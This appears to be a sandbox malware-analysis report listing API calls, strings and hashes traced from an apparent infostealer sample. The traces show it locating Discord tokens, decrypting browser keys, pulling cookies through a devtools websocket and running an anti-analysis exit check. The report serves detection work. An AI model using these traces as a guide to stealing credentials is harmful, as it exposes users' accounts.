                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$Alloc$strcpy_s$??3@lstrlenstrchr$strlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2961803143-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                                  • Instruction ID: ca06d6565e22a4b8139dc5fe8ec41e059b536d5ea08dc7ed3398fadcca26eeb0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7F1D5B19043005BD710ABA5CD49B6FBBE9EF85714F04083EF986972D1D778AC48CB9A
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00412EC4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                                  • API String ID: 348468850-2422389115
                                                                                                                                                                                                                                                                                                  • Opcode ID: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                                                  • Instruction ID: af6f1e03352f6f9f1d8fae1c75086c49a28638e44c42a35a98b4b473fe3f47e4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1E1AF70204308AFD324AF25D895FABB3A9BB44344F04445EFD179B292DB7CE985CB69
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,?,?,00000000,?,?,00000000,?,?,00000000,00000000), ref: 00413081
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%DESKTOP%,00000000,?,00000010,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130AE
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%APPDATA%,00000000,?,0000001A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130DA
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%LOCALAPPDATA%,00000000,?,0000001C,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413106
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%USERPROFILE%,00000000,?,00000028,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413132
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%DOCUMENTS%,00000000,?,00000005,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041315E
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES%,00000000,?,00000026,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041318A
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES_86%,00000000,?,0000002A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131B6
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%RECENT%,00000000,?,00000008,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131E2
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,true,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00413268
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,false,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041327D
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0041301C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$strtok_s$FolderPathlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                                  • API String ID: 1330363096-2422389115
                                                                                                                                                                                                                                                                                                  • Opcode ID: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                                  • Instruction ID: f18559b84add82ea06590c7feb2660792e730a2b0798f24fd2155c98f040b140
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91C1AF70604308AFD214AF25DC95FABB3A9BB44348F00445EFD179B292DB7CA985CB69
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??2@??3@memcpy
                                                                                                                                                                                                                                                                                                  • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                                  • API String ID: 1695611338-4155744131
                                                                                                                                                                                                                                                                                                  • Opcode ID: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                                  • Instruction ID: b745cebb343ebaf7917439795664f4dc5ec349037e75ec0584470be98ece6274
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08D105B1A002145BDB24DF64DD84AAFB775EF41308F11052EF903A72C2DB7CAD958B99
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                                                                  • String ID: block$|
                                                                                                                                                                                                                                                                                                  • API String ID: 3407564107-542838162
                                                                                                                                                                                                                                                                                                  • Opcode ID: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                                                  • Instruction ID: ce61686c9be415db56d3220093c378b95acedfbe19f9b6f22c8a3ac929646854
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03516FB0308708AFD7209F26D849B9BB7A9FB1174AF10440BEC1397290DB7DD6C58A5D
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00010000,?,0041DE17,?), ref: 0041D0C8
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420BC0), ref: 0041D0FD
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.zip), ref: 0041D10F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.zoo), ref: 0041D11F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.arc), ref: 0041D12F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.lzh), ref: 0041D13F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.arj), ref: 0041D14F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.gz), ref: 0041D15F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.tgz), ref: 0041D16F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                                                                                                                                  • API String ID: 1659193697-51310709
                                                                                                                                                                                                                                                                                                  • Opcode ID: d2ea6202fed2a5655530ec6aaa809bab873c2cffd268538dd471dddcc126d90b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 393e261fe4cb7b69f2f042267bc96a23e416e0ea17d9edbe6cd76d0812bafa5d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2ea6202fed2a5655530ec6aaa809bab873c2cffd268538dd471dddcc126d90b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C11BFB0B416227B9B325B745C48FEB6BE8AF15B40B990037F401E2171EB5CD8C286AD
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004010A8
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004010BA
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C52), ref: 004010CE
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420F55), ref: 004010D6
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C48), ref: 004010DE
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420FB1), ref: 004010E6
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C18), ref: 004010EE
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C52), ref: 004010F6
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C50), ref: 004010FE
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0042035D,?,00420C50), ref: 00401106
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0042060F,?,0042035D,?,00420C50), ref: 0040110E
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401116
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040111E
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401126
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040112E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 00401137
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040114A
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401162
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$Heap$Process$AllocNamememsetstrcmp$ComputerExitUser
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2002865342-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d711198b1f504583e68a46c82701488b5e9e546d10a23a30cfae441c6611febe
                                                                                                                                                                                                                                                                                                  • Instruction ID: 34afd6592ec8d0e6f1858942ae0d643bae2899fd03f8c159827732ad67307064
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d711198b1f504583e68a46c82701488b5e9e546d10a23a30cfae441c6611febe
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8113CA57813283AE12132223DC7FBF159C9F92BD9F90012AFA04740C3AA9DDD4650FE
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004153BA
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004153D0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415403
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\discord\), ref: 00415415
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415423
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,Local State), ref: 0041542F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004078F0: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004078F0: lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004078F0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411C00: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041552D,?,?,?), ref: 00411C0B
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,dQw4w9WgXcQ,?,?,?), ref: 00415535
                                                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0041568B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407790: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0040402F,00000000,?,?,?,?,?,?,?), ref: 0040779E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407790: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?), ref: 004077CF
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042150A), ref: 00415659
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,-0000000C), ref: 0041566B
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421509), ref: 00415679
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$AllocFileLocal$FreeGloballstrcpylstrlenmemset$AttributesCloseCreateFolderHandlePathReadSize
                                                                                                                                                                                                                                                                                                  • String ID: Local State$\discord\$dQw4w9WgXcQ
                                                                                                                                                                                                                                                                                                  • API String ID: 3817223191-2067953968
                                                                                                                                                                                                                                                                                                  • Opcode ID: 98569c066dfb2110dfc6498ec6d2e61ad14d41572c1f291bde53b892ab896a34
                                                                                                                                                                                                                                                                                                  • Instruction ID: 194099574810176e2e4ab308ae0ea84b9e6f71d167dd19124bd853461179d086
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98569c066dfb2110dfc6498ec6d2e61ad14d41572c1f291bde53b892ab896a34
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EA17F71D007099BDB10EFB5CC85AEEB7B8FF48304F00455AF905A7152EB78AA85CBA5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1A1
                                                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1E5
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041D200
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041D21B
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041D224
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D235
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041D254
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D265
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D2E6
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D305
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D321
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D346
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$PointerReadUnothrow_t@std@@@__ehfuncinfo$??2@$Time$HandleInformationSizeSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3339682767-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7dc5ab211660f74088cffd7409125a6117dcca4ff2d4ad636a370f5fe0998741
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1051F1B1604705AFE3208F15CC91B6BB7E8FB84744F10492DF595AB290D778E881CB59
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\discord\,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00415C48
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415C68
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415C7F
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415C8D
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\Local Storage\leveldb\CURRENT), ref: 00415C99
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415CA3
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\Local Storage\leveldb), ref: 00415CAF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: GetProcessHeap.KERNEL32 ref: 00415715
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: wsprintfA.USER32 ref: 00415739
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: FindFirstFileA.KERNEL32(?,?), ref: 0041574A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$FileHeaplstrcpystrlen$AllocAttributesFindFirstFolderPathProcessmemcmpwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: \Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                                  • API String ID: 1512132791-1179288657
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                                  • Instruction ID: db52eabd1130b4015811ae594007c4c182e7f7f0e4775522e0b09ec713fe86e8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D41A471900619ABC710EB719C86DEEB36CBF88348F40454AF64666052DB7CF6C58BA9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
